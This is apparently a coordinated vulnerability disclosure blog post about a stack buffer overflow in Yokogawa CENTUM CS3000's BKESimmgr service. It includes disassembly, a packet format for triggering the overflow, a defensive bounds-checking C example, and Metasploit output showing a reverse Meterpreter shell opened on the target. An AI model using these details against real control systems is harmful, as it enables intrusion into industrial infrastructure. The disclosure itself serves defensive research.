Last March 8th, @julianvilas and I spoke at RootedCON about our work with the Yokogawa CENTUM CS3000 product, and on March 10 we disclosed three of the vulnerabilities we had found on this blog. As noted in the talk, we intended to release information about all of the vulnerabilities we found in the product at the time. Today, after some negotiation with Yokogawa and ICS-CERT, we're disclosing another of the discovered vulnerabilities, in a network service that runs by default in a CENTUM CS3000 installation. The vendor asked for some extra time to assess and address this vulnerability, which is why we ended up with a slightly laggy disclosure schedule this time.
For all of you who weren't able to attend RootedCON, we're just going to quote Yokogawa's description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."
The Yokogawa Centum CS3000 solution uses several services in order to provide all of its functionality. The “BKESimmgr.exe” service, started automatically at system startup by default, listens on TCP/34205. By sending a specially crafted packet to TCP/34205 it's possible to trigger a stack-based buffer overflow that allows execution of arbitrary code with the privileges of the CENTUM user.
| Date | Event |
|---|---|
| Dec 27, 2013 | Initial disclosure to the vendor, Yokogawa |
| Jan 13, 2014 | Disclosure to CERT/CC |
| Jan 14, 2014 | CERT/CC assigns VU#479196 and forwards details to JPCERT |
| Feb 03, 2014 | CERT/CC confirms JPCERT and ICS-CERT are coordinating the vulnerabilities. ICS-CERT tracking #: ICS-VU-205881. JPCERT tracking #: JVNVU#98181377, JPECERT#98191377 |
| March 6, 2014 | Yokogawa and ICS-CERT ask for an extension for R7-2013-19.2 (this vulnerability) |
| May 9, 2014 | Metasploit module published in Pull Request #3344 |
The vulnerability exists in the function sub_409310 (IDA notation). This function tries to extract data (probably strings) from a packet sent by the user, but it copies user-controlled data into a fixed-size (64-byte) stack buffer with a memcpy-like routine, using a length that is also taken from the packet:
```
.text:00409360 loc_409360:                          ; CODE XREF: get_string_sub_409310+42j
.text:00409360     mov     ecx, 10h
.text:00409365     xor     eax, eax
.text:00409367     lea     edi, [esp+50h+var_40]
.text:0040936B     add     esi, edx
.text:0040936D     rep stosd                        ; init var_40 with 0x0
.text:0040936F     mov     ecx, ebx                 ; the memcpy length comes from user-controlled data
.text:00409371     lea     edi, [esp+50h+var_40]    ; destination, var_40 (0x40-byte buffer)
.text:00409375     mov     edx, ecx
.text:00409377     lea     eax, [esp+50h+var_40]
.text:0040937B     shr     ecx, 2                   ; divides the size by 4 because rep movsd copies a double word (4 bytes) per iteration
.text:0040937E     rep movsd                        ; esi points to user-controlled data from the packet, leading to the overflow
```
The above assembly chunk translates to:
```c
char dst[64];                          /* var_40: 0x40-byte stack buffer */
memset(dst, 0, sizeof(dst));
memcpy(dst, user_data, user_length);   /* no check of user_length against sizeof(dst) */
```
where user_data and user_length are user-controlled values.
It's possible to reach the vulnerable copy function by sending a specially crafted packet to TCP/34205. According to our understanding, the packet has the following format:
| Field | Size |
|---|---|
| Data | Length specified in the header |
Where the header structure is:
| Field | Size |
|---|---|
| Data Length | 2 bytes |
A packet with an identifier 0x1 in the header can be used to trigger the vulnerability. For this packet the data structure is:
| Field | Size |
|---|---|
| Data Length | 2 bytes |
| Data | Data Length bytes |
A packet with “0x1” as Identifier in both the Header and the Data can be used to reach the vulnerable function. The Data Length and Data fields can be used to trigger the buffer overflow.
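To make the missing check concrete, here is a bounded version of the string extraction, written for this post as an added example; it is not the product's code nor the Metasploit module. It assumes a 2-byte big-endian Data Length (the post does not state the byte order) followed by exactly Data Length bytes, and a 64-byte destination matching var_40; the Identifier fields are left out because their sizes are not given here. The sample packets are constructed, not captured from a real system.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define STRING_BUF_SIZE 64   /* same size as the 0x40-byte stack buffer var_40 */

/* Result codes of the bounded extractor. */
enum extract_status {
    EXTRACT_OK        =  0,
    EXTRACT_TRUNCATED = -1,  /* declared length runs past the bytes actually received */
    EXTRACT_TOO_LONG  = -2   /* declared length does not fit in the destination buffer */
};

/*
 * Hardened counterpart of the memset/memcpy sequence on the page: the length
 * taken from the packet is validated against both the received packet size and
 * the destination size before any copy happens. Returns an extract_status.
 * Byte order of the length field is an assumption (big-endian).
 */
static int extract_string(const uint8_t *pkt, size_t pkt_len, size_t offset,
                          char *dst, size_t dst_size, size_t *out_len)
{
    if (pkt_len < offset + 2)
        return EXTRACT_TRUNCATED;                       /* no room for the 2-byte Data Length */

    size_t declared = ((size_t)pkt[offset] << 8) | pkt[offset + 1];
    const uint8_t *data = pkt + offset + 2;
    size_t avail = pkt_len - offset - 2;                /* bytes that really follow the length */

    if (declared > avail)
        return EXTRACT_TRUNCATED;                       /* length claims more than was received */
    if (declared >= dst_size)
        return EXTRACT_TOO_LONG;                        /* reject instead of overflowing; keeps a NUL */

    memset(dst, 0, dst_size);
    memcpy(dst, data, declared);
    *out_len = declared;
    return EXTRACT_OK;
}

/*
 * Builds a constructed test packet that declares and carries n bytes of 'A'.
 * Returns the total packet length, or 0 if buf is too small.
 */
static size_t build_packet(uint8_t *buf, size_t buf_size, size_t n)
{
    if (buf_size < n + 2)
        return 0;
    buf[0] = (uint8_t)(n >> 8);
    buf[1] = (uint8_t)(n & 0xff);
    memset(buf + 2, 'A', n);
    return n + 2;
}

int main(void)
{
    uint8_t pkt[600];
    char dst[STRING_BUF_SIZE];
    size_t n = 0;

    size_t len = build_packet(pkt, sizeof pkt, 5);
    printf("5-byte payload   -> %d (\"%s\")\n",
           extract_string(pkt, len, 0, dst, sizeof dst, &n), dst);

    len = build_packet(pkt, sizeof pkt, 300);
    printf("300-byte payload -> %d\n", extract_string(pkt, len, 0, dst, sizeof dst, &n));

    /* Same header claiming 300 bytes, but only 8 data bytes delivered. */
    printf("claims 300, has 8 -> %d\n", extract_string(pkt, 10, 0, dst, sizeof dst, &n));
    return 0;
}
```

The two rejections map to the two ways the unchecked copy can go wrong: a length larger than the received packet makes rep movsd read past the input, and a length larger than 64 makes it write past var_40 into the saved registers and SEH record on the stack.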
A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50 running on Windows XP SP3 and Windows 2003 SP2 (DEP bypass), where it is possible to gain arbitrary code execution by corrupting the SEH handler stored on the stack:
```
msf exploit(yokogawa_bkesimmgr_bof) > exploit

[*] Started reverse handler on 192.168.172.1:4444
[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3, sending 427 bytes...
[*] Sending stage (770048 bytes) to 192.168.172.192
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.192:1048) at 2013-11-17 21:17:14 -0600

meterpreter > getuid
Server username: HIS0101\CENTUM
meterpreter > sysinfo
Computer        : HIS0101
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
```
Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.